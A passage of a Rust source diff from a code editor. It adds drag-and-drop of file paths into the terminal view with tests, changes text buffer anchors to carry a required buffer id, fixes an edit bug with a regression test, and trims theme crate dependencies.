cx: &mut App) { + let mut text = paths.iter().map(|path| format!(" {path:?}")).join(""); + text.push(' '); + window.focus(&self.focus_handle(cx), cx); + self.terminal.update(cx, |terminal, _| { + terminal.paste(&text); + }); + } + fn send_text(&mut self, text: &SendText, _: &mut Window, cx: &mut Context) { self.clear_bell(cx); + self.blink_manager.update(cx, BlinkManager::pause_blinking); self.terminal.update(cx, |term, _| { term.input(text.0.to_string().into_bytes()); }); @@ -843,6 +859,7 @@ impl TerminalView { fn send_keystroke(&mut self, text: &SendKeystroke, _: &mut Window, cx: &mut Context) { if let Some(keystroke) = Keystroke::parse(&text.0).log_err() { self.clear_bell(cx); + self.blink_manager.update(cx, BlinkManager::pause_blinking); self.process_keystroke(&keystroke, cx); } } @@ -1104,20 +1121,15 @@ fn 
regex_search_for_query(query: &SearchQuery) -> Option { } } +#[derive(Default)] struct TerminalScrollbarSettingsWrapper; -impl GlobalSetting for TerminalScrollbarSettingsWrapper { - fn get_value(_cx: &App) -> &Self { - &Self - } -} - impl ScrollbarVisibility for TerminalScrollbarSettingsWrapper { fn visibility(&self, cx: &App) -> scrollbars::ShowScrollbar { TerminalSettings::get_global(cx) .scrollbar .show - .map(Into::into) + .map(ui_scrollbar_settings_from_raw) .unwrap_or_else(|| EditorSettings::get_global(cx).scrollbar.show) } } @@ -1340,9 +1352,16 @@ impl Item for TerminalView { None => (IconName::Terminal, Color::Muted, None), }; + let self_handle = self.self_handle.clone(); h_flex() .gap_1() .group("term-tab-icon") + .track_focus(&self.focus_handle) + .on_action(move |action: &RenameTerminal, window, cx| { + self_handle + .update(cx, |this, cx| this.rename_terminal(action, window, cx)) + .ok(); + }) .child( h_flex() .group("term-tab-icon") @@ -1412,6 +1431,154 @@ impl Item for TerminalView { None } + fn handle_drop( + &self, + active_pane: &Pane, + dropped: &dyn Any, + window: &mut Window, + cx: &mut App, + ) -> bool { + let Some(project) = self.project.upgrade() else { + return false; + }; + + if let Some(paths) = dropped.downcast_ref::() { + let is_local = project.read(cx).is_local(); + if is_local { + self.add_paths_to_terminal(paths.paths(), window, cx); + return true; + } + + return false; + } else if let Some(tab) = dropped.downcast_ref::() { + let Some(self_handle) = self.self_handle.upgrade() else { + return false; + }; + + let Some(workspace) = self.workspace.upgrade() else { + return false; + }; + + let Some(this_pane) = workspace.read(cx).pane_for(&self_handle) else { + return false; + }; + + let item = if tab.pane == this_pane { + active_pane.item_for_index(tab.ix) + } else { + tab.pane.read(cx).item_for_index(tab.ix) + }; + + let Some(item) = item else { + return false; + }; + + if item.downcast::().is_some() { + let Some(split_direction) = 
active_pane.drag_split_direction() else { + return false; + }; + + let Some(terminal_panel) = workspace.read(cx).panel::(cx) else { + return false; + }; + + if !terminal_panel.read(cx).center.panes().contains(&&this_pane) { + return false; + } + + let source = tab.pane.clone(); + let item_id_to_move = item.item_id(); + let is_zoomed = { + let terminal_panel = terminal_panel.read(cx); + if terminal_panel.active_pane == this_pane { + active_pane.is_zoomed() + } else { + terminal_panel.active_pane.read(cx).is_zoomed() + } + }; + + let workspace = workspace.downgrade(); + let terminal_panel = terminal_panel.downgrade(); + // Defer the split operation to avoid re-entrancy panic. + // The pane may be the one currently being updated, so we cannot + // call mark_positions (via split) synchronously. + window + .spawn(cx, async move |cx| { + cx.update(|window, cx| { + let Ok(new_pane) = terminal_panel.update(cx, |terminal_panel, cx| { + let new_pane = terminal_panel::new_terminal_pane( + workspace, project, is_zoomed, window, cx, + ); + terminal_panel.apply_tab_bar_buttons(&new_pane, cx); + terminal_panel.center.split( + &this_pane, + &new_pane, + split_direction, + cx, + ); + anyhow::Ok(new_pane) + }) else { + return; + }; + + let Some(new_pane) = new_pane.log_err() else { + return; + }; + + workspace::move_item( + &source, + &new_pane, + item_id_to_move, + new_pane.read(cx).active_item_index(), + true, + window, + cx, + ); + }) + .ok(); + }) + .detach(); + + return true; + } else { + if let Some(project_path) = item.project_path(cx) + && let Some(path) = project.read(cx).absolute_path(&project_path, cx) + { + self.add_paths_to_terminal(&[path], window, cx); + return true; + } + } + + return false; + } else if let Some(selection) = dropped.downcast_ref::() { + let project = project.read(cx); + let paths = selection + .items() + .map(|selected_entry| selected_entry.entry_id) + .filter_map(|entry_id| project.path_for_entry(entry_id, cx)) + .filter_map(|project_path| 
project.absolute_path(&project_path, cx)) + .collect::>(); + + if !paths.is_empty() { + self.add_paths_to_terminal(&paths, window, cx); + } + + return true; + } else if let Some(&entry_id) = dropped.downcast_ref::() { + let project = project.read(cx); + if let Some(path) = project + .path_for_entry(entry_id, cx) + .and_then(|project_path| project.absolute_path(&project_path, cx)) + { + self.add_paths_to_terminal(&[path], window, cx); + } + + return true; + } + + false + } + fn tab_extra_context_menu_actions( &self, _window: &mut Window, @@ -1496,12 +1663,14 @@ impl Item for TerminalView { } } - fn breadcrumbs(&self, cx: &App) -> Option> { - Some(vec![BreadcrumbText { - text: self.terminal().read(cx).breadcrumb_text.clone(), - highlights: None, - font: None, - }]) + fn breadcrumbs(&self, cx: &App) -> Option<(Vec, Option)> { + Some(( + vec![HighlightedText { + text: self.terminal().read(cx).breadcrumb_text.clone().into(), + highlights: vec![], + }], + None, + )) } fn added_to_workspace( @@ -1515,11 +1684,11 @@ impl Item for TerminalView { log::debug!( "Updating workspace id for the terminal, old: {old_id:?}, new: {new_id:?}", ); - cx.background_spawn(TERMINAL_DB.update_workspace_id( - new_id, - old_id, - cx.entity_id().as_u64(), - )) + let db = TerminalDb::global(cx); + let entity_id = cx.entity_id().as_u64(); + cx.background_spawn(async move { + db.update_workspace_id(new_id, old_id, entity_id).await + }) .detach(); } self.workspace_id = workspace.database_id(); @@ -1542,7 +1711,8 @@ impl SerializableItem for TerminalView { _window: &mut Window, cx: &mut App, ) -> Task> { - delete_unloaded_items(alive_items, workspace_id, "terminals", &TERMINAL_DB, cx) + let db = TerminalDb::global(cx); + delete_unloaded_items(alive_items, workspace_id, "terminals", &db, cx) } fn serialize( @@ -1567,14 +1737,13 @@ impl SerializableItem for TerminalView { let custom_title = self.custom_title.clone(); self.needs_serialize = false; + let db = TerminalDb::global(cx); 
Some(cx.background_spawn(async move { if let Some(cwd) = cwd { - TERMINAL_DB - .save_working_directory(item_id, workspace_id, cwd) + db.save_working_directory(item_id, workspace_id, cwd) .await?; } - TERMINAL_DB - .save_custom_title(item_id, workspace_id, custom_title) + db.save_custom_title(item_id, workspace_id, custom_title) .await?; Ok(()) })) @@ -1595,7 +1764,8 @@ impl SerializableItem for TerminalView { window.spawn(cx, async move |cx| { let (cwd, custom_title) = cx .update(|_window, cx| { - let from_db = TERMINAL_DB + let db = TerminalDb::global(cx); + let from_db = db .get_working_directory(item_id, workspace_id) .log_err() .flatten(); @@ -1609,7 +1779,7 @@ impl SerializableItem for TerminalView { .upgrade() .and_then(|workspace| default_working_directory(workspace.read(cx), cx)) }; - let custom_title = TERMINAL_DB + let custom_title = db .get_custom_title(item_id, workspace_id) .log_err() .flatten() @@ -1652,6 +1822,7 @@ impl SearchableItem for TerminalView { regex: true, replacement: false, selection: false, + select_all: false, find_in_results: false, } } @@ -1840,10 +2011,46 @@ mod tests { use super::*; use gpui::TestAppContext; use project::{Entry, Project, ProjectPath, Worktree}; - use std::path::Path; + use std::path::{Path, PathBuf}; use util::paths::PathStyle; use util::rel_path::RelPath; - use workspace::{AppState, MultiWorkspace}; + use workspace::item::test::{TestItem, TestProjectItem}; + use workspace::{AppState, MultiWorkspace, SelectedEntry}; + + fn expected_drop_text(paths: &[PathBuf]) -> String { + let mut text = String::new(); + for path in paths { + text.push(' '); + text.push_str(&format!("{path:?}")); + } + text.push(' '); + text + } + + fn assert_drop_writes_to_terminal( + pane: &Entity, + terminal_view_index: usize, + terminal: &Entity, + dropped: &dyn Any, + expected_text: &str, + window: &mut Window, + cx: &mut Context, + ) { + let _ = terminal.update(cx, |terminal, _| terminal.take_input_log()); + + let handled = pane.update(cx, 
|pane, cx| { + pane.item_for_index(terminal_view_index) + .unwrap() + .handle_drop(pane, dropped, window, cx) + }); + assert!(handled, "handle_drop should return true for {:?}", dropped); + + let mut input_log = terminal.update(cx, |terminal, _| terminal.take_input_log()); + assert_eq!(input_log.len(), 1, "expected exactly one write to terminal"); + let written = + String::from_utf8(input_log.remove(0)).expect("terminal write should be valid UTF-8"); + assert_eq!(written, expected_text); + } // Working directory calculation tests @@ -1972,24 +2179,7 @@ mod tests { let (project, _workspace) = init_test(cx).await; let (wt, _entry) = create_folder_wt(project.clone(), "/root/", cx).await; - let entry = cx - .update(|cx| { - wt.update(cx, |wt, cx| { - wt.create_entry( - RelPath::new(Path::new("src/main.rs"), PathStyle::local()) - .unwrap() - .as_ref() - .into(), - false, - None, - cx, - ) - }) - }) - .await - .unwrap() - .into_included() - .unwrap(); + let entry = create_file_in_worktree(wt.clone(), "src/main.rs", cx).await; insert_active_entry_for(wt, entry, project.clone(), cx); cx.update(|cx| { @@ -2014,9 +2204,21 @@ mod tests { /// Creates a worktree with 1 file: /root.txt pub async fn init_test(cx: &mut TestAppContext) -> (Entity, Entity) { + let (project, workspace, _) = init_test_with_window(cx).await; + (project, workspace) + } + + /// Creates a worktree with 1 file /root.txt and returns the project, workspace, and window handle. 
+ async fn init_test_with_window( + cx: &mut TestAppContext, + ) -> ( + Entity, + Entity, + gpui::WindowHandle, + ) { let params = cx.update(AppState::test); cx.update(|cx| { - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); }); let project = Project::test(params.fs.clone(), [], cx).await; @@ -2026,7 +2228,32 @@ mod tests { .read_with(cx, |mw, _| mw.workspace().clone()) .unwrap(); - (project, workspace) + (project, workspace, window_handle) + } + + /// Creates a file in the given worktree and returns its entry. + async fn create_file_in_worktree( + worktree: Entity, + relative_path: impl AsRef, + cx: &mut TestAppContext, + ) -> Entry { + cx.update(|cx| { + worktree.update(cx, |worktree, cx| { + worktree.create_entry( + RelPath::new(relative_path.as_ref(), PathStyle::local()) + .unwrap() + .as_ref() + .into(), + false, + None, + cx, + ) + }) + }) + .await + .unwrap() + .into_included() + .unwrap() } /// Creates a worktree with 1 folder: /root{suffix}/ @@ -2089,6 +2316,183 @@ mod tests { }); } + // Terminal drag/drop test + + #[gpui::test] + async fn test_handle_drop_writes_paths_for_all_drop_types(cx: &mut TestAppContext) { + let (project, _workspace, window_handle) = init_test_with_window(cx).await; + + let (worktree, _) = create_folder_wt(project.clone(), "/root/", cx).await; + let first_entry = create_file_in_worktree(worktree.clone(), "first.txt", cx).await; + let second_entry = create_file_in_worktree(worktree.clone(), "second.txt", cx).await; + + let worktree_id = worktree.read_with(cx, |worktree, _| worktree.id()); + let first_path = project + .read_with(cx, |project, cx| { + project.absolute_path( + &ProjectPath { + worktree_id, + path: first_entry.path.clone(), + }, + cx, + ) + }) + .unwrap(); + let second_path = project + .read_with(cx, |project, cx| { + project.absolute_path( + &ProjectPath { + worktree_id, + path: second_entry.path.clone(), + }, + cx, + ) + }) + .unwrap(); + + let (active_pane, 
terminal, terminal_view, tab_item) = window_handle + .update(cx, |multi_workspace, window, cx| { + let workspace = multi_workspace.workspace().clone(); + let active_pane = workspace.read(cx).active_pane().clone(); + + let terminal = cx.new(|cx| { + terminal::TerminalBuilder::new_display_only( + CursorShape::default(), + terminal::terminal_settings::AlternateScroll::On, + None, + 0, + cx.background_executor(), + PathStyle::local(), + ) + .unwrap() + .subscribe(cx) + }); + let terminal_view = cx.new(|cx| { + TerminalView::new( + terminal.clone(), + workspace.downgrade(), + None, + project.downgrade(), + window, + cx, + ) + }); + + active_pane.update(cx, |pane, cx| { + pane.add_item( + Box::new(terminal_view.clone()), + true, + false, + None, + window, + cx, + ); + }); + + let tab_project_item = cx.new(|_| TestProjectItem { + entry_id: Some(second_entry.id), + project_path: Some(ProjectPath { + worktree_id, + path: second_entry.path.clone(), + }), + is_dirty: false, + }); + let tab_item = + cx.new(|cx| TestItem::new(cx).with_project_items(&[tab_project_item])); + active_pane.update(cx, |pane, cx| { + pane.add_item(Box::new(tab_item.clone()), true, false, None, window, cx); + }); + + (active_pane, terminal, terminal_view, tab_item) + }) + .unwrap(); + + cx.run_until_parked(); + + window_handle + .update(cx, |multi_workspace, window, cx| { + let workspace = multi_workspace.workspace().clone(); + let terminal_view_index = + active_pane.read(cx).index_for_item(&terminal_view).unwrap(); + let dragged_tab_index = active_pane.read(cx).index_for_item(&tab_item).unwrap(); + + assert!( + workspace.read(cx).pane_for(&terminal_view).is_some(), + "terminal view not registered with workspace after run_until_parked" + ); + + // Dragging an external file should write its path to the terminal + let external_paths = ExternalPaths(vec![first_path.clone()].into()); + assert_drop_writes_to_terminal( + &active_pane, + terminal_view_index, + &terminal, + &external_paths, + 
&expected_drop_text(std::slice::from_ref(&first_path)), + window, + cx, + ); + + // Dragging a tab should write the path of the tab's item to the terminal + let dragged_tab = DraggedTab { + pane: active_pane.clone(), + item: Box::new(tab_item.clone()), + ix: dragged_tab_index, + detail: 0, + is_active: false, + }; + assert_drop_writes_to_terminal( + &active_pane, + terminal_view_index, + &terminal, + &dragged_tab, + &expected_drop_text(std::slice::from_ref(&second_path)), + window, + cx, + ); + + // Dragging multiple selections should write both paths to the terminal + let dragged_selection = DraggedSelection { + active_selection: SelectedEntry { + worktree_id, + entry_id: first_entry.id, + }, + marked_selections: Arc::from([ + SelectedEntry { + worktree_id, + entry_id: first_entry.id, + }, + SelectedEntry { + worktree_id, + entry_id: second_entry.id, + }, + ]), + }; + assert_drop_writes_to_terminal( + &active_pane, + terminal_view_index, + &terminal, + &dragged_selection, + &expected_drop_text(&[first_path.clone(), second_path.clone()]), + window, + cx, + ); + + // Dropping a project entry should write the entry's path to the terminal + let dropped_entry_id = first_entry.id; + assert_drop_writes_to_terminal( + &active_pane, + terminal_view_index, + &terminal, + &dropped_entry_id, + &expected_drop_text(&[first_path]), + window, + cx, + ); + }) + .unwrap(); + } + // Terminal rename tests #[gpui::test] diff --git a/crates/text/Cargo.toml b/crates/text/Cargo.toml index ed02381eb83db5daececd159171a90072244a340..4dc186b374719bdf0112243160d09c14e0bc5970 100644 --- a/crates/text/Cargo.toml +++ b/crates/text/Cargo.toml @@ -35,5 +35,4 @@ ctor.workspace = true gpui = { workspace = true, features = ["test-support"] } rand.workspace = true util = { workspace = true, features = ["test-support"] } -http_client = { workspace = true, features = ["test-support"] } zlog.workspace = true diff --git a/crates/text/src/anchor.rs b/crates/text/src/anchor.rs index 
63e0570e91ef08dfce02fbbca25e97ee7519dc0a..4dbe0e377afb86d176e8cd336e186d209a9d3c78 100644 --- a/crates/text/src/anchor.rs +++ b/crates/text/src/anchor.rs @@ -15,8 +15,8 @@ pub struct Anchor { // we store the replica id and sequence number of the timestamp inline // to avoid the alignment of our fields from increasing the size of this struct // This saves 8 bytes, by allowing replica id, value and bias to occupy the padding - timestamp_replica_id: clock::ReplicaId, - timestamp_value: clock::Seq, + pub(crate) timestamp_replica_id: clock::ReplicaId, + pub(crate) timestamp_value: clock::Seq, /// The byte offset into the text inserted in the operation /// at `timestamp`. @@ -24,7 +24,7 @@ pub struct Anchor { /// Whether this anchor stays attached to the character *before* or *after* /// the offset. pub bias: Bias, - pub buffer_id: Option, + pub buffer_id: BufferId, } impl Debug for Anchor { @@ -46,28 +46,7 @@ impl Debug for Anchor { } impl Anchor { - pub const MIN: Self = Self { - timestamp_replica_id: clock::Lamport::MIN.replica_id, - timestamp_value: clock::Lamport::MIN.value, - offset: u32::MIN, - bias: Bias::Left, - buffer_id: None, - }; - - pub const MAX: Self = Self { - timestamp_replica_id: clock::Lamport::MAX.replica_id, - timestamp_value: clock::Lamport::MAX.value, - offset: u32::MAX, - bias: Bias::Right, - buffer_id: None, - }; - - pub fn new( - timestamp: clock::Lamport, - offset: u32, - bias: Bias, - buffer_id: Option, - ) -> Self { + pub fn new(timestamp: clock::Lamport, offset: u32, bias: Bias, buffer_id: BufferId) -> Self { Self { timestamp_replica_id: timestamp.replica_id, timestamp_value: timestamp.value, @@ -83,7 +62,7 @@ impl Anchor { timestamp_value: clock::Lamport::MIN.value, offset: u32::MIN, bias: Bias::Left, - buffer_id: Some(buffer_id), + buffer_id, } } @@ -93,7 +72,7 @@ impl Anchor { timestamp_value: clock::Lamport::MAX.value, offset: u32::MAX, bias: Bias::Right, - buffer_id: Some(buffer_id), + buffer_id, } } @@ -171,7 +150,7 @@ impl Anchor { 
pub fn is_valid(&self, buffer: &BufferSnapshot) -> bool { if self.is_min() || self.is_max() { true - } else if self.buffer_id.is_none_or(|id| id != buffer.remote_id) { + } else if self.buffer_id != buffer.remote_id { false } else { let Some(fragment_id) = buffer.try_fragment_id_for_anchor(self) else { @@ -207,6 +186,18 @@ impl Anchor { value: self.timestamp_value, } } + + pub fn opaque_id(&self) -> [u8; 20] { + let mut bytes = [0u8; 20]; + let buffer_id: u64 = self.buffer_id.into(); + bytes[0..8].copy_from_slice(&buffer_id.to_le_bytes()); + bytes[8..12].copy_from_slice(&self.offset.to_le_bytes()); + bytes[12..16].copy_from_slice(&self.timestamp_value.to_le_bytes()); + let replica_id = self.timestamp_replica_id.as_u16(); + bytes[16..18].copy_from_slice(&replica_id.to_le_bytes()); + bytes[18] = self.bias as u8; + bytes + } } pub trait OffsetRangeExt { @@ -237,6 +228,7 @@ where pub trait AnchorRangeExt { fn cmp(&self, b: &Range, buffer: &BufferSnapshot) -> Ordering; fn overlaps(&self, b: &Range, buffer: &BufferSnapshot) -> bool; + fn contains_anchor(&self, b: Anchor, buffer: &BufferSnapshot) -> bool; } impl AnchorRangeExt for Range { @@ -250,4 +242,8 @@ impl AnchorRangeExt for Range { fn overlaps(&self, other: &Range, buffer: &BufferSnapshot) -> bool { self.start.cmp(&other.end, buffer).is_lt() && other.start.cmp(&self.end, buffer).is_lt() } + + fn contains_anchor(&self, other: Anchor, buffer: &BufferSnapshot) -> bool { + self.start.cmp(&other, buffer).is_le() && self.end.cmp(&other, buffer).is_ge() + } } diff --git a/crates/text/src/patch.rs b/crates/text/src/patch.rs index eff3d0af110763074d7ca9fdc7842d45eece03c1..376d284473d09df16b93a609c8d49c443aa8a4ab 100644 --- a/crates/text/src/patch.rs +++ b/crates/text/src/patch.rs @@ -56,7 +56,10 @@ where if edit.is_empty() { return; } + self.push_maybe_empty(edit); + } + pub fn push_maybe_empty(&mut self, edit: Edit) { if let Some(last) = self.0.last_mut() { if last.old.end >= edit.old.start { last.old.end = edit.old.end; 
diff --git a/crates/text/src/tests.rs b/crates/text/src/tests.rs index 194ac2a40d5ac96a39177eedd35b991ded30de38..e6e7534cb283ddc7bac61209537c26be657bd8f8 100644 --- a/crates/text/src/tests.rs +++ b/crates/text/src/tests.rs @@ -30,6 +30,24 @@ fn test_edit() { assert_eq!(buffer.text(), "ghiamnoef"); } +#[test] +fn test_point_for_row_and_column_from_external_source() { + let buffer = Buffer::new( + ReplicaId::LOCAL, + BufferId::new(1).unwrap(), + "aéøbcdef\nsecond", + ); + let snapshot = buffer.snapshot(); + + assert_eq!(snapshot.point_from_external_input(0, 0), Point::new(0, 0)); + assert_eq!(snapshot.point_from_external_input(0, 4), Point::new(0, 6)); + assert_eq!( + snapshot.point_from_external_input(0, 100), + Point::new(0, 10) + ); + assert_eq!(snapshot.point_from_external_input(1, 3), Point::new(1, 3)); +} + #[gpui::test(iterations = 100)] fn test_random_edits(mut rng: StdRng) { let operations = env::var("OPERATIONS") @@ -731,6 +749,48 @@ fn test_concurrent_edits() { assert_eq!(buffer3.text(), "a12c34e56"); } +// Regression test: applying a remote edit whose FullOffset range partially +// overlaps a fragment that was already deleted (observed but not visible) +// used to leave the fragment unsplit, causing the rope builder to read past +// the end of the rope. +#[test] +fn test_edit_partially_intersecting_a_deleted_fragment() { + let mut buffer = Buffer::new(ReplicaId::new(1), BufferId::new(1).unwrap(), "abcdefgh"); + + // Delete "cde", creating a single deleted fragment at FullOffset 2..5. + // After this the fragment layout is: + // "ab"(vis, FullOffset 0..2) "cde"(del, 2..5) "fgh"(vis, 5..8) + buffer.edit([(2..5, "")]); + assert_eq!(buffer.text(), "abfgh"); + + // Construct a synthetic remote edit whose version includes the deletion (so + // the "cde" fragment is observed + deleted → !was_visible) but whose + // FullOffset range only partially overlaps it. 
This state arises in + // production when concurrent edits cause different fragment splits on + // different replicas. + let synthetic_timestamp = clock::Lamport { + replica_id: ReplicaId::new(2), + value: 10, + }; + let synthetic_edit = Operation::Edit(EditOperation { + timestamp: synthetic_timestamp, + version: buffer.version(), + // Range 1..4 partially overlaps the deleted "cde" (FullOffset 2..5): + // it covers "b" (1..2) and only "cd" (2..4), leaving "e" (4..5) out. + ranges: vec![FullOffset(1)..FullOffset(4)], + new_text: vec!["".into()], + }); + + // Without the fix this panics with "cannot summarize past end of rope" + // because the full 3-byte "cde" fragment is consumed from the deleted + // rope instead of only the 2-byte intersection. + buffer.apply_ops([synthetic_edit]); + assert_eq!(buffer.text(), "afgh"); + + buffer.undo_operations([(synthetic_timestamp, u32::MAX)].into_iter().collect()); + assert_eq!(buffer.text(), "abfgh"); +} + #[gpui::test(iterations = 100)] fn test_random_concurrent_edits(mut rng: StdRng) { let peers = env::var("PEERS") diff --git a/crates/text/src/text.rs b/crates/text/src/text.rs index a5bdbe443bbaa4723c8d3104bfed28e4c2fe8fdb..026f1272790740c9c2277004e8e96800d87bab15 100644 --- a/crates/text/src/text.rs +++ b/crates/text/src/text.rs @@ -223,10 +223,11 @@ impl History { redo_stack: Vec::new(), transaction_depth: 0, // Don't group transactions in tests unless we opt in, because it's a footgun. 
- #[cfg(any(test, feature = "test-support"))] - group_interval: Duration::ZERO, - #[cfg(not(any(test, feature = "test-support")))] - group_interval: Duration::from_millis(300), + group_interval: if cfg!(any(test, feature = "test-support")) { + Duration::ZERO + } else { + Duration::from_millis(300) + }, } } @@ -1234,15 +1235,18 @@ impl Buffer { let fragment_end = old_fragments.end().0.full_offset(); let mut intersection = fragment.clone(); let intersection_end = cmp::min(range.end, fragment_end); - if fragment.was_visible(version, &self.undo_map) { + if version.observed(fragment.timestamp) { intersection.len = (intersection_end.0 - fragment_start.0) as u32; intersection.insertion_offset += (fragment_start - old_fragments.start().0.full_offset()) as u32; intersection.id = Locator::between(&new_fragments.summary().max_id, &intersection.id); - intersection.deletions.push(timestamp); - intersection.visible = false; - insertion_slices.push(InsertionSlice::from_fragment(timestamp, &intersection)); + if fragment.was_visible(version, &self.undo_map) { + intersection.deletions.push(timestamp); + intersection.visible = false; + insertion_slices + .push(InsertionSlice::from_fragment(timestamp, &intersection)); + } } if intersection.len > 0 { if fragment.visible && !intersection.visible { @@ -1822,6 +1826,10 @@ impl Buffer { tx.try_send(()).ok(); } } + + pub fn set_group_interval(&mut self, group_interval: Duration) { + self.history.group_interval = group_interval; + } } #[cfg(any(test, feature = "test-support"))] @@ -1926,10 +1934,6 @@ impl Buffer { assert!(!self.text().contains("\r\n")); } - pub fn set_group_interval(&mut self, group_interval: Duration) { - self.history.group_interval = group_interval; - } - pub fn random_byte_range(&self, start_offset: usize, rng: &mut impl rand::Rng) -> Range { let end = self.clip_offset(rng.random_range(start_offset..=self.len()), Bias::Right); let start = self.clip_offset(rng.random_range(start_offset..=end), Bias::Right); @@ -2254,6 
+2258,37 @@ impl BufferSnapshot { (row_end_offset - row_start_offset) as u32 } + /// A function to convert character offsets from e.g. user's `go.mod:22:33` input into byte-offset Point columns. + pub fn point_from_external_input(&self, row: u32, characters: u32) -> Point { + const MAX_BYTES_IN_UTF_8: u32 = 4; + + let row = row.min(self.max_point().row); + let start = Point::new(row, 0); + let end = self.clip_point( + Point::new( + row, + characters + .saturating_mul(MAX_BYTES_IN_UTF_8) + .saturating_add(1), + ), + Bias::Right, + ); + let range = start..end; + let mut point = range.start; + let mut remaining_columns = characters; + + for chunk in self.text_for_range(range) { + for character in chunk.chars() { + if remaining_columns == 0 { + return point; + } + remaining_columns -= 1; + point.column += character.len_utf8() as u32; + } + } + point + } + pub fn line_indents_in_row_range( &self, row_range: Range, @@ -2342,7 +2377,7 @@ impl BufferSnapshot { pub fn summaries_for_anchors<'a, D, A>(&'a self, anchors: A) -> impl 'a + Iterator where D: 'a + TextDimension, - A: 'a + IntoIterator, + A: 'a + IntoIterator, { let anchors = anchors.into_iter(); self.summaries_for_anchors_with_payload::(anchors.map(|a| (a, ()))) @@ -2355,7 +2390,7 @@ impl BufferSnapshot { ) -> impl 'a + Iterator where D: 'a + TextDimension, - A: 'a + IntoIterator, + A: 'a + IntoIterator, { let anchors = anchors.into_iter(); let mut fragment_cursor = self @@ -2371,7 +2406,7 @@ impl BufferSnapshot { return (D::from_text_summary(&self.visible_text.summary()), payload); } - let Some(insertion) = self.try_find_fragment(anchor) else { + let Some(insertion) = self.try_find_fragment(&anchor) else { panic!( "invalid insertion for buffer {}@{:?} with anchor {:?}", self.remote_id(), @@ -2379,13 +2414,22 @@ impl BufferSnapshot { anchor ); }; + // TODO verbose debug because we are seeing is_max return false unexpectedly, + // remove this once that is understood and fixed assert_eq!( insertion.timestamp, 
anchor.timestamp(), - "invalid insertion for buffer {}@{:?} and anchor {:?}", + "invalid insertion for buffer {}@{:?}. anchor: {:?}, {:?}, {:?}, {:?}, {:?}. timestamp: {:?}, offset: {:?}, bias: {:?}", self.remote_id(), self.version, - anchor + anchor.timestamp_replica_id, + anchor.timestamp_value, + anchor.offset, + anchor.bias, + anchor.buffer_id, + anchor.timestamp() == clock::Lamport::MAX, + anchor.offset == u32::MAX, + anchor.bias == Bias::Right, ); fragment_cursor.seek_forward(&Some(&insertion.fragment_id), Bias::Left); @@ -2413,7 +2457,7 @@ impl BufferSnapshot { } else if anchor.is_max() { self.visible_text.len() } else { - debug_assert_eq!(anchor.buffer_id, Some(self.remote_id)); + debug_assert_eq!(anchor.buffer_id, self.remote_id); debug_assert!( self.version.observed(anchor.timestamp()), "Anchor timestamp {:?} not observed by buffer {:?}", @@ -2445,7 +2489,7 @@ impl BufferSnapshot { #[cold] fn panic_bad_anchor(&self, anchor: &Anchor) -> ! { - if anchor.buffer_id.is_some_and(|id| id != self.remote_id) { + if anchor.buffer_id != self.remote_id { panic!( "invalid anchor - buffer id does not match: anchor {anchor:?}; buffer id: {}, version: {:?}", self.remote_id, self.version @@ -2509,12 +2553,12 @@ impl BufferSnapshot { } /// Returns an anchor range for the given input position range that is anchored to the text in the range. - pub fn anchor_range_around(&self, position: Range) -> Range { + pub fn anchor_range_inside(&self, position: Range) -> Range { self.anchor_after(position.start)..self.anchor_before(position.end) } /// Returns an anchor range for the given input position range that is anchored to the text before and after. 
- pub fn anchor_range_between(&self, position: Range) -> Range { + pub fn anchor_range_outside(&self, position: Range) -> Range { self.anchor_before(position.start)..self.anchor_after(position.end) } @@ -2564,7 +2608,7 @@ impl BufferSnapshot { fragment.timestamp, fragment.insertion_offset + overshoot as u32, bias, - Some(self.remote_id), + self.remote_id, ) } } @@ -2572,8 +2616,7 @@ impl BufferSnapshot { pub fn can_resolve(&self, anchor: &Anchor) -> bool { anchor.is_min() || anchor.is_max() - || (Some(self.remote_id) == anchor.buffer_id - && self.version.observed(anchor.timestamp())) + || (self.remote_id == anchor.buffer_id && self.version.observed(anchor.timestamp())) } pub fn clip_offset(&self, offset: usize, bias: Bias) -> usize { @@ -2599,7 +2642,10 @@ impl BufferSnapshot { where D: TextDimension + Ord, { - self.edits_since_in_range(since, Anchor::MIN..Anchor::MAX) + self.edits_since_in_range( + since, + Anchor::min_for_buffer(self.remote_id)..Anchor::max_for_buffer(self.remote_id), + ) } pub fn anchored_edits_since<'a, D>( @@ -2609,7 +2655,10 @@ impl BufferSnapshot { where D: TextDimension + Ord, { - self.anchored_edits_since_in_range(since, Anchor::MIN..Anchor::MAX) + self.anchored_edits_since_in_range( + since, + Anchor::min_for_buffer(self.remote_id)..Anchor::max_for_buffer(self.remote_id), + ) } pub fn edits_since_in_range<'a, D>( @@ -2872,13 +2921,13 @@ impl bool> Iterator for Ed fragment.timestamp, fragment.insertion_offset, Bias::Right, - Some(self.buffer_id), + self.buffer_id, ); let end_anchor = Anchor::new( fragment.timestamp, fragment.insertion_offset + fragment.len, Bias::Left, - Some(self.buffer_id), + self.buffer_id, ); if !fragment.was_visible(self.since, self.undos) && fragment.visible { diff --git a/crates/theme/Cargo.toml b/crates/theme/Cargo.toml index ef193c500d461201e8746ad3ec0f33b01e423b18..5bb624dd0c101aa978e296a7ff33c02b2faa99c1 100644 --- a/crates/theme/Cargo.toml +++ b/crates/theme/Cargo.toml @@ -10,7 +10,7 @@ workspace = true 
[features] default = [] -test-support = ["gpui/test-support", "fs/test-support", "settings/test-support"] +test-support = ["gpui/test-support", "syntax_theme/test-support"] [lib] path = "src/theme.rs" @@ -20,10 +20,8 @@ doctest = false anyhow.workspace = true collections.workspace = true derive_more.workspace = true -fs.workspace = true -futures.workspace = true gpui.workspace = true -log.workspace = true +syntax_theme.workspace = true palette = { workspace = true, default-features = false, features = ["std"] } parking_lot.workspace = true refineable.workspace = true @@ -31,13 +29,9 @@ schemars = { workspace = true, features = ["indexmap2"] } serde.workspace = true serde_json.workspace = true serde_json_lenient.workspace = true -settings.workspace = true strum.workspace = true thiserror.workspace = true -util.workspace = true uuid.workspace = true [dev-dependencies] -fs = { workspace = true, features = ["test-support"] } gpui = { workspace = true, features = ["test-support"] } -settings = { workspace = true, features = ["test-support"] } diff --git a/crates/theme/src/fallback_themes.rs b/crates/theme/src/fallback_themes.rs index 72b65f85c9ecb2776fc6066c8b926cfa4bd42929..a739df3213d297ce8230cfb62a08c91928bd62df 100644 --- a/crates/theme/src/fallback_themes.rs +++ b/crates/theme/src/fallback_themes.rs @@ -25,7 +25,8 @@ pub fn zed_default_themes() -> ThemeFamily { // If a theme customizes a foreground version of a status color, but does not // customize the background color, then 